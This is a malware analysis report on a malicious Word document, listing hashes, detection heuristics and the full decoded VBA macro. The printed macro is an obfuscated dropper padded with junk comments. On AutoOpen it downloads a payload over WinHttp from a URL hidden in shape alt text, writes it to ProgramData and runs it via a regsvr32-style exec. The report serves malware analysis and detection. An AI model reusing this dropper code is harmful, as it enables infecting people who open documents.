Office (OOXML) malware analysis — malicious · 80ada89ebe2325b1

MALICIOUS

Office (OOXML)

138.9 KB Created: 2020-10-06 09:54:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-09

MD5: fae0cf3eae2a79dc0d0af4bd01452e1e SHA-1: 6ca06ef10c1ed9f070ad92fe3540908a5c85b22a SHA-256: 80ada89ebe2325b165ec32a902bed4b4dd92e3957129c06b69858ff6cbb50649

170 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Generic-9823827-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Generic-9823827-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set rNlab = CreateObject("WinHttp.WinHttpRequest.5.1")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10503 bytes
SHA-256: `baf6e02eb0e346de2a89b63637e4ff9acfb9ccb72a272d3421c8ec9f9dcd6395`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "FEfrY" Sub FefYh(igPTI, Optional ByVal srqCN As String = "c:\programdata\Sxmak.pdf") ' Postmarked examiner plover racists madcap expatriated blurs ' Hoarseness hairstyles solid beans funerals ' Genuinely disingenuous experienced obliviousness ecumenism flashbulb ' Studentship ennui ' Misapprehension trisector smooth silkier ' Facing ' Ambassadors procreate ' Edgeless drape eurasian algebraic ' Dieter haywain ' Tumbler attics ' Flickering prefixes sheeted fishers ' Ungrounded unclenched ' Noxiousness opting ' Reshaped sickens ' Castings unequivocally impetuous ' Enjoyer ' Amenability adhesiveness discursively megajoules ' Menace expire thawed ' Airlock ' Dockside paralysing lymphoma comport ' Direness reimplementing ' Replacing unjustly plainness torturous reintroduction ' Nightmarish punctuates bartering ' Adroit ' Tidbit tufted ' Breathingspace cocks gapingly hypothesised ' Ilmenite unbeaten ' Earths relaid ' Dossiers thirteen propounded xerography videotapes ' Meaningfully altercations battlegrounds ' Exterminator quicker hares mulberry recalls ' Oldtimers pleasurably ' Eons vertical encapsulate ' Overvalued fenders pimpernel ' Peacetime ' Penitent wooded striver lapdogs trite ' Macrophage syrupy ' Trilingual hydrostatic potters nlpkE = srqCN Open nlpkE For Output As #1 ' Tab range insanity oblongs ' Seekers annotates tits gaseous ' Rippling apprising botany ' Purifier cremated inactivating purl ' Privatisation refiners improvisation molluscan pawnshop ' Secreting facing accusers ' Need conditioning mellower gratefully wifely ' Accustoming interviewee Print #1, igPTI ' Photovoltaic oratorical eugenic plain ' Earthly redefinition decoration ' Scooters lancelot ' Dispersion ' Textiles trappable posh wrangling farmed middleman Close #1 End Sub ' Seizure superintendence ' Cowled obstreperous shall expedient bistro ' Conveyed contributions partisanship absurd punchcard ' Altarpieces tiro glamorous corroborating incursions ' Dithered acrostic receivership Sub AutoOpen() ' Logical dove hates ' Rankings melanoma strong subdivides ' Anaesthetise briefest ' Comber sideshow monadic ablate oink diametrically artichokes ' Khan ' Haggling helpmates jailing consisted jamaican ' Doormen amnesic hypothesising ' Tannoy ' Assimilable pickup culls ' Briefest lilongwe curated ' Cleaved ergot ' Wellintentioned perioperative fulling profoundest squelchy ' Incapacitation vamp eutectic perturb ' Chemiluminescence forfeit ' Masterpiece beatitude infestation ' Jousting peppercorn ' Creepers understated ' Refining ' Experimented shrinkable lounged ' Vole cannibal ' Embarking fuselage mavericks ' Chartered screechier prejudicial instrumented ' Prunings environ lulled ' Flips simplex ' Frolicking ' Obligation shelf splashes ' Disrupting Dim TRzYA As New fmXAO ' Mystically protein texture manipulative ' Crossed cookery flickering smelt ' Worshippers panics unlocking ' Unmentionables appal quiet weaknesses burn casebook ' Protectiveness ' Flours established covenant ' Cavernous markers titration igPTI = TRzYA.QjAMi() ' Addressed undeterred ' Penguins sprig reinvestigation reshuffle sanctum reweighed ' Graphology designers ' Voluminous coachload ' Incinerator thousandths spurns spectrophotometer postgraduates opus FefYh HLjlc(igPTI) ' Blushes ideologist notepad bandaging legendary encapsulate ' Premeditate atombomb ego predicaments ' Breezing ' Zappy inquired terrapins ' Keying toothed grumbled nectars matriarchal crude ' Lows reposed ' Maximality immolate became internees ' Avens orator emeritus maintenance ' Unfavourable ' Gallivanted maputo ' Unloose YWoBy RkSWC(0) + "r32 c:\programdata\Sxmak.pdf", "" End Sub Function yqmYf(DrRXH, KlUup) ' Immortally wherever bland nephews ' Overshoot multiplexor ate loganberries demolition ' Conversational flukey lexicon wittingly ' Jemmy bullfinch subatomic ' Thermostatic ' Sensationalistic sampler needle fricative yqmYf = Split(DrRXH, KlUup) End Function Attribute VB_Name = "fwimO" ' Dynamic introducing ' Ostler geriatrics ' Greengrocer forecasting monomania unfunded ' Axeheads ' Preclude headmistresses underfloor perpetuation mallard Function HLjlc(NvRfD) ' Earwig irrigating pantomime longstanding cuddles tonsillitis ' Intermixing fretless disingenuously ' Contortionist swallowed racetrack rampart ' Presenter HLjlc = StrConv(NvRfD, vbUnicode) ' Abseil reloading ' Bottomless dessert meiotic cancer brittleness ' Wreathes ' Transcendentally peripheral embittered End Function ' Invariably dialectically walk verbiage ' Maseru coopers inflicts furbished ' Interruptibility ' Egoists obscenely malaria ' Engravers skinny ' Jester deprecated quiches mossy Function rfBZQ() ' Sourced churchyards tiptoes ' Roofing superlative roll ' Whining hydrodynamic programs squeal ' Imprecisely burliest red ' Forging calypso line acquits ' Ripening reflexive trumpery creatable resonantly winker ' Commercialised beheld transatlantic bestowing juniper cupful ' Civility wails resemblances infeasibility ' Outweighs typical procreation ' Wooded brochures ' Dazzled archaeologists traditional straitjacket iguanas ' Conveyancing damningly rfBZQ = ActiveDocument.shapes(1).AlternativeText End Function ' Semaphoring supply beatnik ' Auditorium ' Aflame embarrassedly derelict decant disillusioning ' Hijackings hearsay diggers Function RkSWC(eZuzY) ' Raftsman trinity cheats stultified stringer ' Lode brabble ' Epilepsy resea airstrip ' Bestseller scintillations ' Slackers deductible gloves ' Courtrooms ' Redouble logger premiership ' Jinks ' Antennae pacify stumped inauspiciously residuary YYRTc = rfBZQ() TKEfH = yqmYf(YYRTc, "kristi") lIlXs = TKEfH(eZuzY) RkSWC = lIlXs End Function Attribute VB_Name = "fmXAO" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False ' Hotel ' Conceivability premises cassocks talked ' Yes centipedes culled jackinthebox ' Judiciaries embarks frigates Function QjAMi() ' Coefficients defenders essences ' Pretence ' Couch expunged exasperated acquittals mistress ignorant ' Engorge uniting unexplained ' Closing Dim rNlab As Object ' Decreed craftier accosting interbred rekindle flaming ' Vino identified ' Trickled stupefaction infraction claws ' Rinsing ' Levelled axehead ' Contingents junker twiggy sirs Set rNlab = CreateObject("WinHttp.WinHttpRequest.5.1") ' Tailor integrands decried mischievous concentrator gearstick ' Malignity outbound yearly ' Derives confrontations ' Magnetise logicians envelop cosmologies ' Stations revenged ' Cuckolded unnerved impractically ' Rematching ploughing bid soggiest ' Ploys hearttoheart ' Bodkin gates arch ' Neolithic windfalls pigtailed devotedness straggler beneficial ' Staunch ' Inexpressible cubism jailer ' Turreted interstices ' Diverge doctorate hardening blanching wider ' Bravely midriff cormorants strived recures ' Generates rasters nested ' Combusts antic ' Tracksuits sodomite consul apprised ' Bibs dissembling presentation adapting initiates ' Outlook workdays parroting brawnier ' Bluemoon ' Listening destroys backstage ' Brackets writable hoaxed loaders ' Crasher disarrayed ' Demagogues ' Missed north sojourners knapsack stomping following ' Bullies ' Toadies liberated subtracts catguts neuroscience ' Envelop tangents civilly ' Nitric sweats subjugated result xozjD = RkSWC(1) ' Recklessly crossword collaboration ' Sedge cannot peevish tracker ' Aviaries correct ' Thins ' Landlocked favoured premising ' Piteously obscenity pinheads adjourns sixths legatees classifying ' Uncle favouring vows ' Deceitfulness rusts clowns traditional waveband rNlab.Open "GET", xozjD, False ' Waggishly gaging grids pastime growler ' Columbus stalin underpins housekeeping overripe tenfold salons wallpapering ' Outreach prep bootees ' Stylisation sunblock drownings ' Bureau expansionism despisal sighted transactions ' Gunwale hypertonic races ' Germicidal silty earthenware chattels biliary ' Parsings stingily undo vehemently tungsten vamp rNlab.Send ' Pegasus banter psalmody ' Brochures ' Extramural everchanging colourless ' Hexagrams unaroused colonials ' Trumpeters unhealthy grasper suddenness ' Courted pleat disregard teed pour QjAMi = rNlab.responsebody End Function Attribute VB_Name = "SImsQ" Sub YWoBy(gJbLL, JmjQm) ' Folklorist ashcans ' Deriders expression ' Misdemeanours amended ' Drafter bowel ' Resting microbe gaudy tensions ' Coffin impedance ascribes polygon ' Interacted pinked ' Compiled majestically sicker ' Bate numerals Set TBeDG = CreateObject(JmjQm + RkSWC(2) + "ll").exec(gJbLL) ' Nympholepsy kilobits spilt ' Interests gaggle asinine recirculate ' Laird loams immersion concretely ' Cavalrymen drawls ' Displayable cementing enraptured ' Cinder sorrows wildly ' Antigen starches widen reaffirmed occasional ' Urgings diagnoses ' Graphics diametric ' Husky epitomised merriest synthesised insolent ' Penknife meringues slink saccharides plentifully ' Categories organisable slackened reassuringly ' Rigmarole skied ' Sunsets ale ashbins ' Delible ' Afro prolongation introspectively wreathe hooks ' Obligatory emersion slower logger collaborationist contortions ' Bonnet impatient tribe scribble ' Axis ' Stead anticipates along ' Trophy seating champ axiomatically blubbering ' Mystically cleanse convertible ' Boorishly minuted giraffes dressmaker ' Covenanters ineligible ' Had ' Yearningly gleaming ' Voter discretionary plait ' Psychotic rotund womanise boiling ' Asocial eggs crotch ' Soot repossession licked ' Redundantly reconversion ' Bossing fishhooks gorging compatible passageways ' Dishonestly signposted face ' Petrol foredeck gleefully insipid accuse unremarkable jetted ' Linesman exterminators coupon spindly ' Pact ' Prussian fermenting End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	40960 bytes
SHA-256: `d280366ac7d8f586661c95cbe37d5ea1fdb94946a7b5395c3f8a099f74bb6bc6`

Open this report in the interactive analyzer, or submit your own file for analysis.